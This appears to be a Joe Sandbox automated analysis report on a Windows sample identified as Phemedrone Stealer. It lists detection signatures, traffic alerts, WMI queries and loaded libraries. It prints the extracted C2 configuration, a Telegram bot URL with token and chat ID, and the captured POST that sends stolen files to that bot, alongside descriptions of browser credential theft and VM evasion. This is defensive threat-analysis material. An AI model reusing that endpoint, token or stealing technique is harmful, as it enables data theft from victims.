Joe Sandbox Cloud Basic Analysis Report
Edit tour

Windows Analysis Report
qqnal04.exe

Overview

General Information

Sample name:qqnal04.exe
Analysis ID:1591799
MD5:b63e93f067d727c983c46012f35647d4
SHA1:07591cf86732d0e0b1f822eef2147c24bda77df3
SHA256:eebb47c48137f331e9e7e203763300c343a3643f88c60318667b5d525c40a058
Tags:exeinfostealermalwaretrojanuser-Joker
Infos:

Detection

Phemedrone Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Generic Stealer
Yara detected Phemedrone Stealer
Yara detected Telegram Recon
AI detected suspicious sample
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • qqnal04.exe (PID: 3008 cmdline: "C:\Users\user\Desktop\qqnal04.exe" MD5: B63E93F067D727C983C46012F35647D4)
  • cleanup

Malware Configuration

Threatname: Phemedrone Stealer

{
  "C2 url": "https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendMessage?chat_id=8013500311"
}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
qqnal04.exeJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
    qqnal04.exeJoeSecurity_TelegramReconYara detected Telegram ReconJoe Security
      qqnal04.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        00000000.00000002.2107964117.000002903C016000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
          00000000.00000002.2106933727.000002902BB04000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
            00000000.00000002.2107964117.000002903BCC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
              00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GenericStealer_9Yara detected Generic StealerJoe Security
                00000000.00000000.2018774350.0000029029CC2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
                  Click to see the 5 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  0.0.qqnal04.exe.29029cc0000.0.unpackJoeSecurity_PhemedroneStealerYara detected Phemedrone StealerJoe Security
                    0.0.qqnal04.exe.29029cc0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T13:34:04.024220+010020390091A Network Trojan was detected149.154.167.220443192.168.2.549708TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T13:34:03.068552+010028438561A Network Trojan was detected192.168.2.549708149.154.167.220443TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-15T13:34:03.066622+010018100081Potentially Bad Traffic192.168.2.549708149.154.167.220443TCP

                      Joe Sandbox Signatures

                      • AV Detection
                      • Cryptography
                      • Compliance
                      • Networking
                      • System Summary
                      • Data Obfuscation
                      • Hooking and other Techniques for Hiding and Protection
                      • Malware Analysis System Evasion
                      • Anti Debugging
                      • Language, Device and Operating System Detection
                      • Lowering of HIPS / PFW / Operating System Security Settings
                      • Stealing of Sensitive Information
                      • Remote Access Functionality

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: qqnal04.exeMalware Configuration Extractor: Phemedrone Stealer {"C2 url": "https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendMessage?chat_id=8013500311"}
                      Source: qqnal04.exeVirustotal: Detection: 44%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.9% probability
                      Source: qqnal04.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F215F2 CryptUnprotectData,0_2_00007FF848F215F2
                      Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: qqnal04.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: \mw\csharp\Phemedrone Stealer V2.3.2\Phemedrone-Stealer\obj\Release\system.pdb source: qqnal04.exe

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49708 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2843856 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screenshot.) M2 : 192.168.2.5:49708 -> 149.154.167.220:443
                      Source: Network trafficSuricata IDS: 2039009 - Severity 1 - ET MALWARE Win32/SaintStealer CnC Response : 149.154.167.220:443 -> 192.168.2.5:49708
                      Source: unknownDNS query: name: api.telegram.org
                      Source: Yara matchFile source: qqnal04.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.qqnal04.exe.29029cc0000.0.unpack, type: UNPACKEDPE
                      Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                      Source: Joe Sandbox ViewIP Address: 172.67.70.233 172.67.70.233
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: get.geojs.io
                      Source: global trafficHTTP traffic detected: POST /bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd3536fad403f1Host: api.telegram.orgContent-Length: 734520Expect: 100-continueConnection: Keep-Alive
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /v1/ip/geo.json HTTP/1.1Host: get.geojs.ioConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: get.geojs.io
                      Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                      Source: unknownHTTP traffic detected: POST /bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/602.37 (KHTML, like Gecko) Chrome/49.0.1422.399 Safari/600Content-Type: multipart/form-data; boundary=----------------------------8dd3536fad403f1Host: api.telegram.orgContent-Length: 734520Expect: 100-continueConnection: Keep-Alive
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BB52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                      Source: qqnal04.exeString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
                      Source: qqnal04.exeString found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
                      Source: qqnal04.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
                      Source: qqnal04.exeString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BC7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://get.geojs.io
                      Source: qqnal04.exeString found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
                      Source: qqnal04.exeString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
                      Source: qqnal04.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: qqnal04.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
                      Source: qqnal04.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                      Source: qqnal04.exeString found in binary or memory: https://api.telegram.org/bot
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BB20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7105371916:AAHmKYUFBY4gzPciIZ6nC4H-7mczREtwqxk/sendDocument0
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BC76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geHj
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmp, qqnal04.exe, 00000000.00000002.2106933727.000002902BBC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io
                      Source: qqnal04.exe, 00000000.00000002.2106933727.000002902BA91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://get.geojs.io/v1/ip/geo.json
                      Source: qqnal04.exeString found in binary or memory: https://get.geojs.io/v1/ip/geo.json)root
                      Source: qqnal04.exeString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: qqnal04.exeString found in binary or memory: https://www.globalsign.com/repository/06
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownHTTPS traffic detected: 172.67.70.233:443 -> 192.168.2.5:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F26A950_2_00007FF848F26A95
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F18B680_2_00007FF848F18B68
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F15B720_2_00007FF848F15B72
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F14DC60_2_00007FF848F14DC6
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F1BF7A0_2_00007FF848F1BF7A
                      Source: C:\Users\user\Desktop\qqnal04.exeCode function: 0_2_00007FF848F176D00_2_00007FF848F176D0
                      Source: qqnal04.exeStatic PE information: invalid certificate
                      Source: qqnal04.exe, 00000000.00000000.2018798042.0000029029CE0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesystem.exeH vs qqnal04.exe
                      Source: qqnal04.exeBinary or memory string: OriginalFilenamesystem.exeH vs qqnal04.exe
                      Source: qqnal04.exeBinary string: ParentProcessId3\Device\LanmanRedirector\
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/1@2/2
                      Source: C:\Users\user\Desktop\qqnal04.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\qqnal04.exe.logJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\qqnal04.exeMutant created: \Sessions\1\BaseNamedObjects\BestStealer
                      Source: qqnal04.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: qqnal04.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2152
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1720
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3596
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4732
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 420
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2140
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5708
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5152
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2132
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1700
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2992
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3852
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5144
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6000
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1688
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3840
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3408
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1252
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2104
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6056
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6496
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2528
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2096
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3388
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1232
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 368
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5236
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 872
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4672
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3376
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1220
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 788
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3372
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 780
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2932
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4652
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1632
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 564
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2492
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 332
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2484
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6792
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1188
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5496
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5064
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 752
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1612
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2472
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3764
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3304
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1172
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2464
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3756
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2836
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2456
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2024
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5040
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5636
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5896
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1584
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 6604
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1660
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 1148
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2440
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 2868
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 280
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5020
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 3724
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 5016
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 732
                      Source: C:\Users\user\Desktop\qqnal04.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 4172
                      Source: C:\Users\user\Desktop\qqnal04.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: qqnal04.exeVirustotal: Detection: 44%
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\qqnal04.exeSection loaded: schannel.dllJump to behavior
